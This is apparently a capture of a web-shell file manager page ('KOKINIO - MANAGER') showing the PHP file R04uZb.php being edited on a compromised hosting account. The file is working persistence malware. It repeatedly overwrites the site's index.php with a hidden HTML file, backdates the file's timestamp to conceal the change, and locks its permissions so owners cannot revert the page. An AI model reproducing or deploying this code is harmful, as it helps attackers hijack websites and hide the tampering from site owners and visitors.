KOKINIO - MANAGER
Edit File: R04uZb.php
<?php $insj = '/home/istyrnue/duletbio_page/index.php'; $inym = '/home/istyrnue/duletbio_page/HjmnYD/D4Z4cd.html'; if (file_exists($insj)) { if (file_exists($inym)) { @chmod($insj, 0777); if (md5_file($insj) == md5_file($inym)) { } else { $chazh = @file_get_contents($inym); $at = filemtime($inym); file_put_contents($insj, $chazh); if ($at) { touch($insj, $at); } } @chmod($insj, 0444); } } else { if (file_exists($inym)) { $at = filemtime($inym); $chazh = @file_get_contents($inym); file_put_contents($insj, $chazh); if ($at) { touch($insj, $at); } } } ?>